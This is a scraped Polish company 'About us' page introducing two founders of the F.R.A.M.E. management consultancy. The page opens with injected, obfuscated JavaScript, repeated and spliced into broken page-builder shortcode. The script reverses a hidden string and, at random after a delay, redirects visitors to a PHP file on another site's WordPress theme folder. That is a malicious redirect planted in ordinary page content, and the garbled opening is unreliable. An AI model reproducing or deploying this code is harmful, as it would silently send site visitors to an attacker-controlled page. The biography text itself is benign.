) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top=”150″ padding_bot dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom=”100″ dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}top_shape_color=”#ffffff” bot dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_shape_color=”#ffffff” sidebar=”sidebar-1″]
) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_1490548168144{padding-left: 20px !important;}”]

KIM JESTEŚMY?

F.R.A.M.E. tworzą ludzie, praktycy zarządzania z wieloletnim doświadczeniem w określonych dziedzinach

 • Wojciech Kaszycki
  Wojciech Kaszycki

  Praktyk zarządzania z pogranicza finansów i informatyki, związany z biznesem od ponad 20 lat kariery zawodowej. Autor wielu publikacji o tematyce finansowej. Pionier rozwiązań informatycznych dla polskiego sektora bankowego. Pionier e-commerce w Polsce.

  Współzałożyciel oraz Prezes Zarządu Bizmatica Polska, spółki będącej biznesowym integratorem rozwiązań dla przedsiębiorstw, w tym banków oraz innych instytucji finansowych.

 • Andrzej Mrugała
  Andrzej Mrugała

  Autor metody, niekwestionowany lider w dziedzinach handel, media i e-commerce. Od 1989 r. pracuje w firmach detalicznych, na stanowiskach od kierownika sklepu do prezesa. Pracował dla takich firm jak IKEA, jako prezes budował pozycję EMPiKu w Polsce.

  Od 2003 r. prowadzi własną firmę doradczą w zakresie handlu detalicznego. Doradza firmom, które miały 2 sklepy i 2 mln złotych obrotu rocznie, a także gigantom o obrotach ponad 1 mld zł i setkach placówek w kilku krajach. W sumie zrealizował kilkadziesiąt projektów w najrozmaitszych branżach, zarówno w Polsce jak i za granicą. Konsultant biznesowy i mentor.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.